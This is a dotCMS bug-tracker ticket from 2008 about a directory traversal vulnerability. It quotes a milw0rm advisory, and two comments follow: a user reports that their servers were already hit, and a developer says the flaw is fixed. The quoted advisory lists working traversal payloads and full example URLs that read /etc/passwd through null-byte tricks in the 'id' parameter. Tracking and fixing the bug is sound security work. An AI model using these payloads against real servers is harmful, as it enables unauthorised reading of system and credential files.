[#DOTCMS-1837] Security Expoit -- directory transversal

dotCMS

Security Expoit -- directory transversal

Created: August 16, 2008 2:48 PM Updated: July 23, 2009 11:54 AM Due: 8/16/08

Component/s:

a. Unknown

Affects Version/s:

None

Fix Version/s:

1.6.5

Time Tracking:

Not Specified

Environment:

all

Description

« Hide

http://www.milw0rm.com/exploits/6247

++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ script:dotCMS
+ home: http://www.dotcms.org
+ demo: http://www.dotcms.org/the_dotcms/demos/demo.dot
+ founder: Don of h4cky0u.org
+ Vulnerability: Directory traversal
++++++++++++++++++++++++++++++++++++++++++++++++++++++

exploit:
/index.dot?id=../../../../../../../../etc/passwd%00.jpg
/macros/macros_detail.dot?id=../../../../../../../../etc/passwd%00.html

example:
http://demo.dotcms.org/news/index.dot?id=../../../../../../../../etc/passwd%00.jpg
http://demo.dotcms.org/getting_started/macros/macros_detail.dot?id=../../../../../../../../etc/passwd%00.html

solution:
Script should filter meta characters from user input.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2008-08-15]

All

Comments

Work Log

Change History

Subversion Commits

FishEye

Sort Order:

[ Permlink | « Hide ]

Jennifer Canup - August 16, 2008 2:51 PM

this issue was reported yesterday and our servers have already been hit. we had planned to launch our new public site on Monday but until this vulnerability is resolved we will not be able to launch.

[ Permlink | « Hide ]

Will Ezell - August 16, 2008 4:59 PM

This has been fixed. We are checking to insure that the file being served is within the accepted directories of include files. This will prevent directory traversal.